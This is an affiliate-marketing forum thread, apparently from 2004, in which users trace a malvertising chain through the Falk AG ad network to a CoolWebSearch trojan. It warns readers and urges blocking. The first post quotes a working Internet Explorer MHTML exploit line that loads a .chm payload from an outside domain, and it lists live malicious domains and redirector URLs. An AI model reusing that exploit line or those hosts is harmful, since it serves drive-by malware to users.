Results 1 to 8 of 8
  1. #1
    ABW Adviser Panel Dynamoo's Avatar
    Join Date
    January 18th, 2005
    Location
    Opposite the Slough of Despond
    Posts
    5,465
    Falk eSolutions AG - http://www.falkag.de/ - is a German advertising network that allows .ASP based ads. They're not very picky about their advertisers though, they seem to allow everything from scumware pushers to blue chip customers on.

    Here's a nasty little scumware trail.

    Comingsoon.net (don't go there unless you know what you're doing as it will infect your PC) is a popular movies site (Alexa rank 8643). It buys advertising from Falk AG - typically routing through falkag.net. There are several advertising banners/popups using Falk's services . I can see one from T-Mobile for example.

    One of these is a popup banner for an outfit called ntsearch.com based in Russia:

    Registrant:
    ZAO Gator
    p.o. box #84
    St-Petersburg, Spb 193241
    RU

    Domain name: NTSEARCH.COM

    Administrative Contact:
    Gator, ZAO gator_domains@yahoo.com
    p.o. box #84
    St-Petersburg, Spb 193241
    RU
    +7-812-325-08-16
    Technical Contact:
    Gator, ZAO gator_domains@yahoo.com
    p.o. box #84
    St-Petersburg, Spb 193241
    RU
    +7-812-930-63-38 Fax: +7-812-930-63-38



    Registrar of Record: TUCOWS, INC.
    Record last updated on 05-Jul-2004.
    Record expires on 18-Jul-2006.
    Record created on 18-Jul-2002.

    Domain servers in listed order:
    NS2.NTSEARCH.COM 64.246.33.205
    NS1.NTSEARCH.COM 64.246.32.114

    It's hosted by the spam-friendly US host Everyones Internet, Inc (EV1.NET).

    The redirector I get is http:// www.ntsearch.com /uk_in.php?acc=zon10 DO NOT VISIT THIS

    This bounced through 64.246.46.32 (EV1.NET) to http:// 2awm.com/ 309.php DO NOT VISIT THIS based in the Czech Republic:

    Registrant:
    Somjet, inc
    Adam Oker (info@adultn.com)
    Jungmannova 31
    Prague 1
    null,11000
    CZ
    Tel. +42.022449435

    This is hosted on 195.225.177.21 in the Ukraine.

    What we get on the 2awm.com server is a line containing:

    document.write(cxw.value.replace("${PR}","ms-its:mhtml:file://c:\\nosuch.mht!http://www.2awm.com /file/309.chm::/1.htm"))
    REALLY REALLY DON'T CLICK THIS

    This uses a well-known IE exploit to install some sort of crapware. In this case it looks like a variant of CoolWebSearch (CWS) (i.e. about the worst trojan you can get).

    We use CA eTrust which detects the trojan as HTML.MHTMLRedir.exploit - this is easy to protect against if you keep your patches up to date. http://support.microsoft.com/default...b;en-us;260897 has more information.

    At no point was the user asked permission to install this software. The originating site (Comingsoon.net) is only guilty of make a bad choice of advertising network. Apart from the obvious wrongdoing by the CWS pushers, it's clear that Falk AG is happy to take the money from the scumware merchants.

    Other suspect domains
    These are hosted on the Ukranian server:
    2awm.com
    Awmgate.com
    Check-wire.com
    Lab-wire.com
    Online-more.com
    Find-by-web.com
    Search4www.com

    falkag.net seems to split traffic between US and European targetted servers:
    * as-us.falkag.net ~ 60%
    * as-eu.falkag.net ~ 40%

    If you're a network administrator, I'd suggest blocking access to all of falkag.net.

    If you're an advertiser, I'd suggest reconsidering your relationship, and if you're a publisher I would pull those ads right now before you get the blame for spreading spyware.
    Innovative advertising with Slimeware Corporation and Telephore. Mail-order fuel with Petrol Direct.

  2. #2
    2005 Linkshare Golden Link Award Winner  ecomcity's Avatar
    Join Date
    January 18th, 2005
    Location
    St Clair Shores MI.
    Posts
    17,328
    Thanks Dynamoo as I forwarded this post to 3 cybercrime units for sniffing out the money trail and any cybercriminal activity. More and more of these 3rd would wanks are bundling actual computer virus trojan horse viruses to make un-installs troublesome. They also use the expoit hidden back door to download other BHO's for ifestation fees.
    Webmaster's... Mike and Charlie

    "What have you done today to put real value into a referral click...from a shoppers viewpoint!"

  3. #3
    ABW Adviser Panel Dynamoo's Avatar
    Join Date
    January 18th, 2005
    Location
    Opposite the Slough of Despond
    Posts
    5,465
    Falk AG do it again!

    http://www.theregister.co.uk/2004/11...server_attack/

    I've already added them to my adware blocker. When I go back to my real-life work, they'll be blocked at the proxy there too.
    Innovative advertising with Slimeware Corporation and Telephore. Mail-order fuel with Petrol Direct.

  4. #4
    ABW Adviser Panel Dynamoo's Avatar
    Join Date
    January 18th, 2005
    Location
    Opposite the Slough of Despond
    Posts
    5,465
    Uh-oh.. now it's been picked up on Slashdot:
    http://it.slashdot.org/article.pl?si...id=113&tid=172

    Remember folks, you read it here first!
    Innovative advertising with Slimeware Corporation and Telephore. Mail-order fuel with Petrol Direct.

  5. #5
    ABW Ambassador
    Join Date
    January 18th, 2005
    Location
    ÄúsTrálíĺ
    Posts
    1,372
    Gorilla Nation uses Falk to server their banners. I'm sure there are many other advertising companies using Falk also.
    Gorilla Nation is a large advertiser on movie/film/etc sites.

    Are you sure it's just not one particular advertiser using the Falk network? (Like 1 advertiser using fastclick etc)

  6. #6
    ABW Adviser Panel Dynamoo's Avatar
    Join Date
    January 18th, 2005
    Location
    Opposite the Slough of Despond
    Posts
    5,465
    Yes, the pattern seems to be that theres a single advertiser who's ads are being carried ny Falk AG, and that advertiser is being served only to certain sites. Falk's servers are infected with anything as far as I can tell, but in the case I looked at above it did seem to be a deliberate attempt to spread a trojan by the advertiser.
    Innovative advertising with Slimeware Corporation and Telephore. Mail-order fuel with Petrol Direct.

  7. #7
    ABW Adviser Panel Dynamoo's Avatar
    Join Date
    January 18th, 2005
    Location
    Opposite the Slough of Despond
    Posts
    5,465
    The Register has a statement here:

    http://www.theregister.co.uk/2004/11...fra_statement/

    Frankly this looks like BS from Falk AG.
    Innovative advertising with Slimeware Corporation and Telephore. Mail-order fuel with Petrol Direct.

  8. #8
    2005 Linkshare Golden Link Award Winner  ecomcity's Avatar
    Join Date
    January 18th, 2005
    Location
    St Clair Shores MI.
    Posts
    17,328
    Spookie world when the AdWhores hire computer worm and trojan horse virus writers to assists in stealth installs of Adware/spyware to earn commissions while stealing privacy info.
    Webmaster's... Mike and Charlie

    "What have you done today to put real value into a referral click...from a shoppers viewpoint!"

  9. Newsletter Signup

+ Reply to Thread

Similar Threads

  1. Meghan Falk, Brand New to the Affiliate Game
    By MeghanFalk in forum Introduce Yourself
    Replies: 1
    Last Post: February 12th, 2014, 06:01 PM
  2. RIP Peter Falk
    By Phil Kaufman aka AffiliateHound in forum Virtual Family and Off-Topic
    Replies: 3
    Last Post: June 24th, 2011, 04:13 PM
  3. New Forum - MidPhase UK2.net US2.net and AH Hosting
    By Haiko de Poel, Jr. in forum Aff.biz
    Replies: 9
    Last Post: June 4th, 2008, 12:59 PM
  4. metabolife.net herbalpill.net facialmask.net
    By rclark in forum Midnight Cafe'
    Replies: 2
    Last Post: February 21st, 2006, 03:23 PM
  5. Amazon ECS 4.0 & ASP.NET (VB.NET) QUESTION
    By stfarm45 in forum Programming / Datafeeds / Tools
    Replies: 0
    Last Post: March 2nd, 2005, 10:44 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •